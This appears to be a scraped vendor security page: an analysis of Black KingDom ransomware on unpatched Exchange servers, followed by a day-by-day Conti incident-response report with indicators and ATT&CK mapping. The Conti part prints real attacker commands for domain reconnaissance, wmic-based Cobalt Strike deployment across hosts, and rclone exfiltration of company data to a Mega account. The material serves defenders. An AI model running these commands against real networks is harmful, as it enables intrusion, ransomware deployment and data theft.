Ransomware continues to be a top cyber threat, with 30% of organizations admitting having been victimized in the past IT security is the responsibility of everyone within an organization. It falls on IT managers, therefore, to educate their workforces to best safeguard against attacks when they happen. Sophos Home scans downloaded programs in real time and analyzes data from questionable websites and servers you come across to detect malicious files and hidden keylogger spyware. Plus, Sophos Home stops malware from stealing your information by encrypting your keystrokes. As Sophos recently discovered in its State of Ransomware 2020 survey, only 24% of organizations breached in a ransomware incident were able to detect the intrusion and stop it before it was able to encrypt their files. Sophos’ new EDR capabilities help security and IT teams detect threats and breaches that could otherwise take months to uncover.
Following the DearCry ransomware attacks reported on last week, another ransomware gang has also started to target vulnerable Exchange servers with another ransomware, called Black KingDom. Sophos telemetry began detecting the ransomware on Thursday March 18 as it targeted Exchange servers that remain unpatched against the ProxyLogon vulnerabilities disclosed by Microsoft earlier this month.
The Black KingDom ransomware is far from the most sophisticated payload we’ve seen. In fact, our early analysis reveals that it is somewhat rudimentary and amateurish in its composition, but it can still cause a great deal of damage. It may be related to a ransomware of the same name that appeared last year on machines that, at the time, were running a vulnerable version of the Pulse Secure VPN concentrator software.
Delivered through a webshell that was sent over Tor
The delivery of Black KingDom was orchestrated from a remote server with an IP address that geolocates to Germany, 185.220.101.204, while the attacker operated from 185.220.101.216. Unfortunately, because both IP addresses belong to a Tor exit node, it’s impossible to know where the attackers are physically located.
The threat actor exploited the on-premises versions of Microsoft Exchange Server, abusing the remote code execution (RCE) vulnerability also known as ProxyLogon (CVE-2021-27065).
After successfully breaching the Exchange server, the adversary delivered a webshell. This webshell offers remote access to the server and allows the execution of arbitrary commands.
The webshell ChackLogsPL.aspx was dropped here:
Other filenames of webshells we have observed being used by this adversary are ckPassPL.aspx and hackIdIO.aspx.
The webshell was written to disk by w3wp.exe, an Internet Information Server (IIS) Worker Process that hosts the Exchange admin center (EAC), which Microsoft has given the internal name ECP (Exchange Control Panel):
Ransomware execution and behavior
Following the deployment of the webshell, the attackers initiate the attack by issuing a PowerShell command (not shown here in its entirety due to size constraints):
This decodes to the following script (amended to enhance readability):
This script downloads the ransomware payload from:
The $(f1) part is generated by function f1, which generates a random string of 15 alphabet characters. So, ultimately, the exact web address looks something like this:
(As we went to press, the yuuuu44 domain was redirecting visitors to NASA.GOV)
The attackers store the ransomware payload in the [ComputerName]c$Windowssystem32 folder, with a random filename generated by that same function, f1. For example:
The script executes the ransomware by invoking Win32_Process via WMI, (the Windows Management Interface). The script includes the ability to upload the ransomware to other computers on the network and execute it.
Impact
The ransomware binary is based on a Python script that has been compiled into an executable using a tool called PyInstaller. With some effort we were able to decompile the binary back into its original source code, which helped us understand the ransomware’s functionality. The creator named the source code 0xfff.py, the “fff” of which represents a hexadecimal value for the decimal number 4095. What the significance of this is remains a mystery.
The ransomware has a built-in block list of folders the contents of which it will not encrypt:
It attempts to stop services running on the machine with SQL in the service name, effectively terminating databases, presumably so they may be encrypted as well:
The encryption key is generated with the following code:
In the gen_string function call, the script generates a random string of 64 characters in length. The script then hashes this value with MD5, and converts that hash to hexadecimal characters, and uses that as the encryption key.
It also generated a gen_id, which is a victim identifier the ransomware embeds into the ransom note as a way for victims to let the threat actor know who the victim is, so they can purchase the correct decryption key.
The key and gen_id are then uploaded to an account on mega.io. However, if for whatever reason the ransomware is unable to upload this randomly-generated encryption key to Mega, it has a fallback in the form of a hardcoded, static key:
The base64-encoded key represents this hexadecimal value: eebf143cf615ecbe2ede01527f8178b3
The file system behavior of the file encryption function is straightforward: Read (original) > Overwrite (encrypted) > Rename:
This translates into the following file system activity:
The code for renaming the now-encrypted files chooses a random string between 4 and 7 characters and appends that to the filename, so its suffix no longer maps to the application it’s supposed to:
To prevent encrypted files from being attacked twice, ransomware generally appends the same uniquely chosen file extension to every encrypted file or places an indicator in the file header (or at the end). However, the Black Kingdom ransomware targeting Exchange servers doesn’t do this. It does not check if a file or the machine has been hit before – either by itself or by another ransomware. As a result, the encrypted files can become encrypted multiple times over, even by the same ransomware, making decryption extremely complicated. This oversight is probably unintentional, but could have been anticipated.
Our CryptoGuard protection caught the ransomware attempting to encrypt data. Below, raw telemetry from our signature-agnostic technology shows the ransomware binary being executed via WMI as documented above (read the Process Trace sequence backwards, from 3 to 1):
To further complicate and hinder incident response, the ransomware deletes the Windows Event logs:
Once the system is encrypted (or after 20 minutes of work), the ransomware runs this subroutine that disables the mouse and keyboard, and draws a full screen window on top of the desktop.
This generates a full-screen window that looks like this, complete with countdown timer:
Alongside the encrypted data a ransom note is stored in a file named decrypt_file.TxT:
Here is a current overview of the transactions received by the attackers’ cryptocurrency wallet, according to BitRef. It seems at least one victim has paid the ransom demand and the attackers have already withdrawn the money from the wallet:
Detection guidance
Users of Sophos endpoint protection products may see the webshells detected as any of the long list of detections in this post, and the ransomware payload may be detected as Troj/Ransom-GFU, Troj/Ransom-GFV or Troj/Ransom-GFP or by the CryptoGuard feature within Intercept X. SophosLabs has published indicators of compromise to the SophosLabs Github. Threat hunters using Sophos EDR may also use the queries posted in this article to find additional indicators of compromise on their networks.
Acknowledgments
SophosLabs would like to acknowledge the contributions of Vikas Singh, Alex Vermaning and Gabor Szappanos to this report.
Editor’s note: This is one of a series of articles focused on the Conti ransomware family, which include technical details of the Conti ransomware, Conti ransomware: Evasive by nature, and a guide IT administrators can use to deal with the impact of an attack involving Conti ransomware, What to expect when you’ve been hit with Conti ransomware.
Conti ransomware is a global threat affecting victims mainly in North America and Western Europe. Sophos Rapid Response has encountered multiple confirmed Conti ransomware attacks in the past six months. Sophos operators also strongly believe they encountered what would have been another incident of Conti had they not stopped the attack before ransomware was deployed.
Since its first appearance, Conti was assumed to be the successor to Ryuk with one crucial difference in that the group behind Conti threatens to leak exfiltrated data to strong-arm victims into paying the ransom. This use of exfiltrated data means organizations from almost any industry could be targeted, although the Conti group has hit organizations in retail, manufacturing, construction, and the public sector more often.
One confirmed case involved an attack on an organization who was able to remove the attacker from one server only to find the attacker had gained access to two servers at the same time. Despite the company’s efforts, Sophos Rapid Response needed to be called in to deal with a Conti ransomware attack against nearly 300 endpoints.
It took just over 2.5 hours for the Rapid Response team to determine what accounts and devices were affected, what tools were used in the attack, block the attack from continuing, and walk the customer through the process of the Rapid Response engagement.
In less than 24 hours after Rapid Response was engaged, most of the customer’s critical infrastructure was able to restart normal operation, and within 48 hours, the team confirmed the initial access point of the attack.
A thorough incident response plan is key to dealing with a similar Conti ransomware attack. Check out the Sophos IT admin’s guide to What to expect when you’ve been hit with Conti ransomware.
Let’s dig into the Conti attack, day-by-day, and in some cases minute-by-minute.
Day 1 – Initial access and scans
The initial access point for the attack was eventually determined to be a FortiGate firewall running vulnerable firmware, version 5.6.3 build 1547(GA). Once inside, the attacker gained access to two different servers simultaneously, down to the exact second.
It took the attacker exactly 16 minutes to exploit the vulnerable firewall and gain domain admin access to the two servers.
Over the next six hours, the attacker deployed a Cobalt Strike beacon on one of the servers and began running commands to gather a list of domain admin accounts:
cmd.exe /C nltest /dclist:[target company name]
cmd.exe /C net group “domain Admins” /domain
cmd.exe /C nltest /DOMAIN_TRUSTS
cmd.exe /C adft.bat
cmd.exe /C type shares.txt
And commands to map out the basic network topography:
ping <computer name>.<domain>.local -n 1
cmd.exe /C portscan <IP ranges> icmp 1024
On the second server, the attacker did nothing at first.
The victim identified and shut down the attack in progress on one server, unfortunately they did not detect the access the attacker had to the other server.
After the victim shut down the attacker’s access to the first server, it took just 15 minutes for the attacker to pivot to the second server, deploy another Cobalt Strike beacon and resume the attack. The attacker then used the domain admin account compromised to gain access to a third server and ran the following Windows Management Instrumentation (WMI) command to remotely deploy another Cobalt Strike beacon on the third server :
cmd.exe /C wmic /node:<IP Address> process call create “rundll32.exe
C:Programdatasys.dll entryPoint
Day 2
On the second day, Sophos did not detect any malicious activity.
Day 3 – Data exfiltration and credential gathering
Over the course of 10 hours on the third day of the attack, the threat actors identified directories with potentially valuable data and began exfiltration.
The attacker deployed RClone to the third server and created a config file with the login credentials for Mega. The directories exfiltrated included data from the Human Resources department, IT department, credit department, accounting, senior staff, and directories labeled as budget.
First, the attacker deployed RClone and created a config file containing the email and password for the Mega account where the exfiltrated data would be transferred.
rclone.exe copy “<Server 3><Folder path>” remote:<victim name> -q –ignore-existing –auto-confirm –multi-thread-streams 12 –transfers 12
C:Users<compromised domain admin>.configrclonerclone.conf
The attacker also executed a batch script, cp.bat, to search for user credentials by copying all XLSX files with the string “pas” in the filename.
Day 4 – Conti attacks and beginning of Rapid Response engagement
On day one of the attack, the threat actors had gathered a map of the victim’s network and saved text file lists of the endpoints and servers. At approximately 1:00 am local time on day 4, the attacker used batch scripts to loop through those lists of devices in order to copy Cobalt Strike loaders onto a total of nearly 300 endpoints and servers.
First, the attacker deployed a Cobalt Strike beacon to a fourth server as a test:
cmd.exe /C wmic /node: <Server 4 IP Address> process call create “rundll32.exe C:Programdatadoc.dll entryPoint”
Next, the attacker executed a batch script, copy_files_srv.bat, to deploy the Cobalt Strike loader, doc.dll, on the target servers listed in srv.txt:
for /f %%i in (srv.txt) do copy “C:ProgramDatadoc.dll” %%ic$ProgramDatadoc.dll
Then, the attacker executed another batch script, wm_start.bat, to run the Cobalt Strike loader on each server listed in srv.txt via rundll32.exe and initiate the beacon:
for /f %%i in (srv.txt) do wmic /node: %%i process call create “rundll32.exe C:Programdatadoc.dll entryPoint”
These last two commands were then repeated with the batch script, copy_files_work.bat, and text file work.txt to deploy and initiate the Cobalt Strike beacons onto nearly 300 target endpoints on the victim’s network.
The Cobalt Strike beacons were kicked into gear 40 minutes after being loaded onto the target devices and used a technique called reflective DLL injection to launch Conti.
“A DLL file dropped onto the target devices connected to a C2 address and gets the ransomware code hosted there. The ransomware code is then executed directly in memory, meaning when it starts encrypting the target machine it has never been written to disk,” Peter Mackenzie, manager of Rapid Response said. “Despite how clever this is, Sophos Intercept X technology would still have no problem stopping it.”
The C2 addresses used were:
- Docns[.]com/us/ky/louisville/312-s-fourth-st.html
- docns[.]com/OrderEntryService.asmx/AddOrderLine
- 23[.]106[.]160[.]174
- 91[.]199[.]212[.]52
Over the course of the next 3 hours, Sophos Intercept X successfully detected and blocked Conti on all of the protected computers, but damage was done to unprotected devices. For more how the DLL reflection injection and Conti ransomware worked, check out the technical details on Conti ransomware by Sophos Uncut.
The customer blocked all internet traffic except Sophos, shut down critical infrastructure, and called Sophos Rapid Response.
Within the first 45 minutes Rapid Response was under contract, before even having the kickoff call to walk the customer through the service, the Rapid Response team had:
- Identified the compromised account used in the attack
- Identified and blocked the malicious DLL used to deploy Conti
- Identified and blocked the command and control (C2) addresses used by the attacker
- Identified all endpoints targeted
- Deployed Sophos Managed Threat Response (MTR) to the customer environment
- Begun collecting forensic evidence
In the 45 minutes following the kickoff call, the Rapid Response team also built a list of all the data exfiltrated by the attacker.
Day 5 – Back to normal
By the fifth day after the attacker first gained access to the victim’s network, and less than 24 hours from when Sophos Rapid Response was called in, the customer was able to restart most of their critical infrastructure to normal operation.
With the help of Rapid Response, all unprotected machines were recovered either from backups or by re-imaging, then protected with Sophos and multi-factor authentication was enabled on the customer’s VPN.
The investigation for Rapid Response was not over yet though. The team identified a possible second exfiltration of data, a second compromised account, and suspicious Remote Desktop Protocol (RDP) traffic through the vulnerable firewall.
Day 6 and 7 – Finishing up and handing off
With the attack stopped and recovery complete, all that was left was a bit of cleanup, including confirming the initial access method for the attacker and having the customer upgrade their firewall to close that vulnerable point.
Sophos Rapid Response then handed off the customer to the Sophos Managed Threat Response team to continue 24/7 monitoring.
Detection and IoCs
Components of Conti ransomware can detected in Sophos Endpoint Protection under the following definitions: HPmal/Conti-B, Mem/Conti-B, or Mem/Meter-D.
Additional indicators of compromise have been published to the SophosLabs Github.
Sophos Malware Detection
Conti group Tactics, Techniques, and Procedures (TTPs)
In this case, the Conti group gained initial entry into victim environments by exploiting public facing applications (MITRE ATT&CK T1190) and using a compromised domain admin account (MITRE ATT&CK T1212) to facilitate lateral movement.
Sophos Ransomware Protection
The threat actor exploited a vulnerability in FortiGate firewall version 5.6.3 build 1547(GA). Known exploits for this vulnerable firmware include one critically rated vulnerability (CVE-2018-13379) and one high rated vulnerability (CVE-2018-13374).
The group used multiple batch scripts for system network configuration discovery (MITRE ATT&CK T1016), remote system discovery (MITRE ATT&CK T1018), and network service scanning (MITRE ATT&CK T1046). Immediately following initial access, the threat actor searched to identify domain admin accounts (MITRE ATT&CK T1078.002) and network shares (MITRE ATT&CK T1021.002).
Deployment of Cobalt Strike beacons and loaders were performed using Windows Management Instrumentation commands (MITRE ATT&CK T1047).
The threat actor used RClone in order to exfiltrate data to file storage service MEGA (MITRE ATT&CK T1567.002).
Cobalt Strike beacons loaded onto all target systems to perform a DLL reflective injection attack (MITRE ATT&CK T1055.001), where a DLL called to C2 addresses to get the Conti code, then load it and execute it directly in memory without writing the ransomware to disk before encrypting data for impact (MITRE ATT&CK T1486).
If you are experiencing an active incident and need immediate response, contact Sophos Rapid Response. For details of our 24/7 Managed Threat Response (MTR) service, visit our website or speak with your Sophos representative.
Sophos Ransomware Detection
Special thanks to Abhijit Gupta, Bill Kearney, David Anderson, Elida Leite, Kevin Simpson, Matthew Sharf, Paul Jacobs, Peter Mackenzie, Ratul Ghosh, Robert Weiland, Sergio Bestulic, Syed Shahram Ahmed, Varun Hirve, and Vikas Singh for their efforts in detecting, investigating, and responding to these threats.
Comments are closed.